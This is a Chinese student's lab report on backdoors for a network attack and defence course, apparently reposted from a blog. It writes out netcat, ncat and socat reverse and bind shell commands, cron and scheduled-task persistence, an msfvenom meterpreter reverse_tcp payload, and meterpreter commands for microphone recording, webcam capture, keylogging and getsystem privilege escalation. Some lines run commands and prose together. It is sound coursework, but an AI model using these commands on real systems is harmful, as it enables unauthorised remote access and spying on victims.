(1)使用netcat获取主机操作Shell,cron启动 (0.5分)
(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。
ncat.exe -l -p 8888
nc 192.168.1.100 8888 -e /bin/sh
pwd
nc -l -p 8888
ncat.exe -e cmd.exe ip_of_linux 8888
ncat.exe -l 5319 > 175319out.txt
nc 192.168.1.100 5319 < 175319.in
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以man cron
crontab -e
m分钟 h小时 dom日期 mon月 dow周几 command执行的命令
crontab -l
来查看,-l表示list。工作站锁定时
C:\Users\20175319JY\Desktop\socat\socat.exe
tcp-listen:5319 exec:cmd.exe,pty,stderr
socat - tcp:192.168.1.102:5319
。即可获取shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=5319 -f exe > 20175319.exe
复制到Winmsfconsole
shell
获取Windows命令行界面,以方便执行Windows内置功能指令,exit退出record_mic
截获目标主机音频webcam_snap
获取摄像头截图screenshot
获取主机截图keyscan_start
开始记录击键keyscan_dump
读取击键的记录getuid
查看主机当前用户,getsystem
进行提权。(1)例举你能想到的一个后门进入到你系统中的可能方式?
第三方网网站下载的软件中捆绑了后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
windows:设置任务启动计划、开机启动、安装为服务、和其他文件捆绑、powershell
linux:设置cron、各种启动脚本、和其他文件捆绑
(3)Meterpreter有哪些给你映像深刻的功能?
能够获取ruby交互界面,用ruby直接编程,调用windows任何API。
(4)如何发现自己有系统有没有被安装后门?
安装杀毒软件、定期更新病毒库;如果电脑忽然出现卡顿,或者内存占有变高,或者出现异常的进程、服务、启动项,都要小心后门。
这次实验让我对后门原理有了更深的理解,同时发现自己的电脑是很危险的,平时要多加防范,注意安全,尽量从官方网站下载正规软件,不要在第三方网站下载。
2019-2020-2 20175319江野《网络对抗技术》Exp2 后门原理与实践
原文:https://www.cnblogs.com/killer-queen/p/12512984.html